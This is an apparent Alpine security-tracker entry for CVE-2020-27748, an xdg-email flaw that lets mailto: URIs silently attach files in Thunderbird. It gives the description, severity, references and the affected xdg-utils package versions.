CVE-2020-27748

Name
CVE-2020-27748
Description
A flaw was found in the xdg-email component of xdg-utils-1.1.0-rc1 and newer. When handling mailto: URIs, xdg-email allows attachments to be discreetly added via the URI when being passed to Thunderbird. An attacker could potentially send a victim a URI that automatically attaches a sensitive file to a new email. If a victim user does not notice that an attachment was added and sends the email, this could result in sensitive information disclosure. It has been confirmed that the code behind this issue is in xdg-email and not in Thunderbird.
NVD Severity
medium
Other trackers
Mailing lists
Exploits
Forges
GitHub (code, issues), Aports (code, issues)

References

Type URI
MISC https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
MISC https://bugzilla.redhat.com/show_bug.cgi?id=1899769

Match rules

CPE URI Source package Min version Max version
cpe:2.3:a:freedesktop:xdg-utils:*:*:*:*:*:*:*:* xdg-utils >= 1.1.0 <= None

Vulnerable and fixed packages

Source package Branch Version Maintainer Status
xdg-utils edge-community 1.1.3-r0 Natanael Copa <ncopa@alpinelinux.org> possibly vulnerable
xdg-utils 3.14-community 1.1.3-r0 Natanael Copa <ncopa@alpinelinux.org> possibly vulnerable
xdg-utils 3.11-main 1.1.3-r0 Natanael Copa <ncopa@alpinelinux.org> possibly vulnerable